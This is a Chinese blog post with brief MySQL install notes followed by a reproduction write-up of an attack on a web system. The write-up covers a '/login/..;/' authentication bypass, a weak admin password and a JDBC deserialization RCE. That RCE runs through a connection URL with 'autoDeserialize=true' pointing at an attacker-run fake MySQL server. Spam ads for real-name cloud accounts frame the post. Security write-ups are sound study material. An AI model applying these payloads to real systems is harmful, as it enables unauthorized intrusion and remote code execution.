运维知识点-MySQL从小白到入土-CSDN博客

阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6

在这里插入图片描述

MySQL从小白到入土

mysql 服务器安装

 https://dev.mysql.com/downloads/mysql/

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

windows mysql 服务

net start mysql

漏洞复现-mysql jdbc反序列化-权限绕过

乌云 通用系统的洞
fofa 查

在这里插入图片描述

但是这个系统被他魔改过加了验证码前端也加密了,老洞肯定没有。

在这里插入图片描述
登录框大概长这样
看了一下有shiro但是打不了。

在这里插入图片描述

权限绕过发现/login/…;/ 能直接进去

在这里插入图片描述
看不到任何数据点系统参数配置这个功能发现404

在这里插入图片描述
去看了下同cms的站
发现直接访问index.jsp
也可以进去但是src那个站进不去不知道被咋改过
发现这个功能跳到/adminLogin.jsp 然后弱口令admin123进去了

在这里插入图片描述
当时直接把这个登录的包拿到src的那个站去试了一下

发现他只是把jsp删了实际上功能还在
然后就直接进到了系统参数配置这里

在这里插入图片描述
大概长这样有一个测试连接的功能点了一下抓包包结构如下
在这里插入图片描述
可以控制mysql连接地址于是想到mysql服务端读客户端文件。
将mysql连接地址改为恶意mysql服务端地址发包好像不行
在这里插入图片描述
然后又想到mysql jdbc反序列化以前没搞过在github找到一个项目。

 https://github.com/fnmsd/MySQL_Fake_Server

需要一个ysoserial.jar我这边使用的

  https://github.com/zema1/ysoserial

可以直接打回显看了下上面那个项目的README感觉有点麻烦于是直接把
在这里插入图片描述

 url=jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true
&useUnicode=true
&characterEncoding=utf-8
&username=yso_urldns_http//www.baidu.com/
&password=123456	 

服务器这边开启恶意mysql服务端发包。
在这里插入图片描述
在这里插入图片描述
成功RCE

阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6
标签: mysql